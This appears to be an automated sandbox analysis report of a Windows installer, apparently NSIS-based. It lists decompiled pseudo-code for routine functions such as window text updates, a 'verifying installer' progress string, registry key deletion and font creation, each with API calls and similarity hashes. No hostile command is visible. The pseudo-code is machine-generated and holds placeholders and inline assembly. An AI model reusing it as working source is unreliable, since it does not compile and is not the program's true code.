                			E0040521E(CHAR* _a4, CHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				CHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				CHAR* _t26;
                				signed int _t27;
                				CHAR* _t28;
                				long _t29;
                				signed int _t39;
                
                				_t26 =  *0x42ec04; // 0x0
                				_v8 = _t26;
                				if(_t26 != 0) {
                					_t27 =  *0x42f4f4;
                					_v12 = _t27;
                					_t39 = _t27 & 0x00000001;
                					if(_t39 == 0) {
                						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                					}
                					_t26 = lstrlenA(0x42a070);
                					_a4 = _t26;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) == 0) {
                							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
                						}
                						if((_v12 & 0x00000002) == 0) {
                							_v32 = 0x42a070;
                							_v52 = 1;
                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t39;
                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                						}
                						if(_t39 != 0) {
                							_t28 = _a4;
                							 *((char*)(_t28 + 0x42a070)) = 0;
                							return _t28;
                						}
                					} else {
                						_t26 =  &(_a4[lstrlenA(_a8)]);
                						if(_t26 < 0x800) {
                							_t26 = lstrcatA(0x42a070, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t26;
                			}

                APIs
                • lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                • SendMessageA.USER32 ref: 004052B2
                • SendMessageA.USER32 ref: 004052CC
                • SendMessageA.USER32 ref: 004052DA
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                				char _v68;
                				int _t11;
                				int _t20;
                
                				if(_a8 == 0x110) {
                					SetTimer(_a4, 1, 0xfa, 0);
                					_a8 = 0x113;
                				}
                				if(_a8 == 0x113) {
                					_t20 =  *0x41d440; // 0x63200
                					_t11 =  *0x42944c;
                					if(_t20 >= _t11) {
                						_t20 = _t11;
                					}
                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                					SetWindowTextA(_a4,  &_v68);
                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                				}
                				return 0;
                			}

                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                • MulDiv.KERNEL32(00063200,00000064,?), ref: 00402E00
                • wsprintfA.USER32 ref: 00402E10
                • SetWindowTextA.USER32(?,?), ref: 00402E20
                • SetDlgItemTextA.USER32 ref: 00402E32
                Strings
                • verifying installer: %d%%, xrefs: 00402E0A
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E004027DF(int __ebx) {
                				void* _t26;
                				long _t31;
                				int _t45;
                				void* _t49;
                				void* _t51;
                				void* _t54;
                				void* _t55;
                				void* _t56;
                
                				_t45 = __ebx;
                				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                				_t50 = E00402BCE(0xfffffff0);
                				 *(_t56 - 0x78) = _t23;
                				if(E00405AFC(_t50) == 0) {
                					E00402BCE(0xffffffed);
                				}
                				E00405C6B(_t50);
                				_t26 = E00405C90(_t50, 0x40000000, 2);
                				 *(_t56 + 8) = _t26;
                				if(_t26 != 0xffffffff) {
                					_t31 =  *0x42f438;
                					 *(_t56 - 0x30) = _t31;
                					_t49 = GlobalAlloc(0x40, _t31);
                					if(_t49 != _t45) {
                						E00403300(_t45);
                						E004032EA(_t49,  *(_t56 - 0x30));
                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                						 *(_t56 - 0x38) = _t54;
                						if(_t54 != _t45) {
                							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                							while( *_t54 != _t45) {
                								_t47 =  *_t54;
                								_t55 = _t54 + 8;
                								 *(_t56 - 0x8c) =  *_t54;
                								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                								_t54 = _t55 +  *(_t56 - 0x8c);
                							}
                							GlobalFree( *(_t56 - 0x38));
                						}
                						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                						GlobalFree(_t49);
                						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
                					}
                					CloseHandle( *(_t56 + 8));
                				}
                				_t51 = 0xfffffff3;
                				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                					_t51 = 0xffffffef;
                					DeleteFileA( *(_t56 - 0x78));
                					 *((intOrPtr*)(_t56 - 4)) = 1;
                				}
                				_push(_t51);
                				E00401423();
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                				return 0;
                			}

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                • GlobalFree.KERNEL32 ref: 0040288E
                • GlobalFree.KERNEL32 ref: 004028A1
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                				void* _v8;
                				int _v12;
                				char _v276;
                				void* _t27;
                				signed int _t33;
                				intOrPtr* _t35;
                				signed int _t45;
                				signed int _t46;
                				signed int _t47;
                
                				_t46 = _a12;
                				_t47 = _t46 & 0x00000300;
                				_t45 = _t46 & 0x00000001;
                				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                				if(_t27 == 0) {
                					if((_a12 & 0x00000002) == 0) {
                						L3:
                						_push(0x105);
                						_push( &_v276);
                						_push(0);
                						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                							__eflags = _t45;
                							if(__eflags != 0) {
                								L10:
                								RegCloseKey(_v8);
                								return 0x3eb;
                							}
                							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                							__eflags = _t33;
                							if(_t33 != 0) {
                								break;
                							}
                							_push(0x105);
                							_push( &_v276);
                							_push(_t45);
                						}
                						RegCloseKey(_v8);
                						_t35 = E00406500(3);
                						if(_t35 != 0) {
                							return  *_t35(_a4, _a8, _t47, 0);
                						}
                						return RegDeleteKeyA(_a4, _a8);
                					}
                					_v12 = 0;
                					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                						goto L10;
                					}
                					goto L3;
                				}
                				return _t27;
                			}

                APIs
                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseEnum$DeleteValue
                • String ID:
                • API String ID: 1354259210-0
                • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00401D65(void* __ebx, void* __edx) {
                				struct HWND__* _t30;
                				CHAR* _t38;
                				void* _t48;
                				void* _t53;
                				signed int _t55;
                				signed int _t58;
                				long _t61;
                				void* _t65;
                
                				_t53 = __ebx;
                				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                				} else {
                					E00402BAC(2);
                					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                				}
                				_t55 =  *(_t65 - 0x1c);
                				 *(_t65 + 8) = _t30;
                				_t58 = _t55 & 0x00000004;
                				 *(_t65 - 0xc) = _t55 & 0x00000003;
                				 *(_t65 - 0x34) = _t55 >> 0x1f;
                				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                				if((_t55 & 0x00010000) == 0) {
                					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                				} else {
                					_t38 = E00402BCE(0x11);
                				}
                				 *(_t65 - 8) = _t38;
                				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                				asm("sbb edi, edi");
                				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                					DeleteObject(_t48);
                				}
                				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                					_push(_t61);
                					E00406055();
                				}
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00401E35(intOrPtr __edx) {
                				void* __esi;
                				int _t9;
                				signed char _t15;
                				struct HFONT__* _t18;
                				intOrPtr _t30;
                				struct HDC__* _t31;
                				void* _t33;
                				void* _t35;
                
                				_t30 = __edx;
                				_t31 = GetDC( *(_t35 - 8));
                				_t9 = E00402BAC(2);
                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                				ReleaseDC( *(_t35 - 8), _t31);
                				 *0x40b848 = E00402BAC(3);
                				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                				 *0x40b84f = 1;
                				 *0x40b84c = _t15 & 0x00000001;
                				 *0x40b84d = _t15 & 0x00000002;
                				 *0x40b84e = _t15 & 0x00000004;
                				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                				_t18 = CreateFontIndirectA(0x40b838);
                				_push(_t18);
                				_push(_t33);
                				E00406055();
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                				return 0;
                			}

                APIs
                • GetDC.USER32(?), ref: 00401E38
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                • ReleaseDC.USER32 ref: 00401E6B
                • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CapsCreateDeviceFontIndirectRelease
                • String ID:
                • API String ID: 3808545654-0
                • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00401C2E(intOrPtr __edx) {
                				int _t29;
                				long _t30;
                				signed int _t32;
                				CHAR* _t35;
                				long _t36;
                				int _t41;
                				signed int _t42;
                				int _t46;
                				int _t56;
                				intOrPtr _t57;
                				struct HWND__* _t61;
                				void* _t64;
                
                				_t57 = __edx;
                				_t29 = E00402BAC(3);
                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                				 *(_t64 - 8) = _t29;
                				_t30 = E00402BAC(4);
                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                				 *(_t64 + 8) = _t30;
                				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                				}
                				__eflags =  *(_t64 - 0x14) & 0x00000002;
                				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                					 *(_t64 + 8) = E00402BCE(0x44);
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t59 = E00402BCE();
                					_t32 = E00402BCE();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t35 =  ~( *_t31) & _t59;
                					__eflags = _t35;
                					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                					goto L10;
                				} else {
                					_t61 = E00402BAC();
                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                					_t41 = E00402BAC(2);
                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                					_t56 =  *(_t64 - 0x14) >> 2;
                					if(__eflags == 0) {
                						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                						L10:
                						 *(_t64 - 0xc) = _t36;
                					} else {
                						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                					_push( *(_t64 - 0xc));
                					E00406055();
                				}
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                				return 0;
                			}

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                • SendMessageA.USER32 ref: 00401CB6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                				char _v36;
                				char _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t21;
                				signed int _t22;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				void* _t41;
                				signed int _t43;
                				signed int _t47;
                				signed int _t50;
                				signed int _t51;
                				signed int _t53;
                
                				_t21 = _a16;
                				_t51 = _a12;
                				_t41 = 0xffffffdc;
                				if(_t21 == 0) {
                					_push(0x14);
                					_pop(0);
                					_t22 = _t51;
                					if(_t51 < 0x100000) {
                						_push(0xa);
                						_pop(0);
                						_t41 = 0xffffffdd;
                					}
                					if(_t51 < 0x400) {
                						_t41 = 0xffffffde;
                					}
                					if(_t51 < 0xffff3333) {
                						_t50 = 0x14;
                						asm("cdq");
                						_t22 = 1 / _t50 + _t51;
                					}
                					_t23 = _t22 & 0x00ffffff;
                					_t53 = _t22 >> 0;
                					_t43 = 0xa;
                					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                				} else {
                					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                					_t47 = 0;
                				}
                				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                			}

                APIs
                • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                • wsprintfA.USER32 ref: 00404A6A
                • SetDlgItemTextA.USER32 ref: 00404A7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                • Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
                • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405A8F(CHAR* _a4) {
                				CHAR* _t7;
                
                				_t7 = _a4;
                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                					lstrcatA(_t7, 0x40a014);
                				}
                				return _t7;
                			}

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                Memory Dump Source
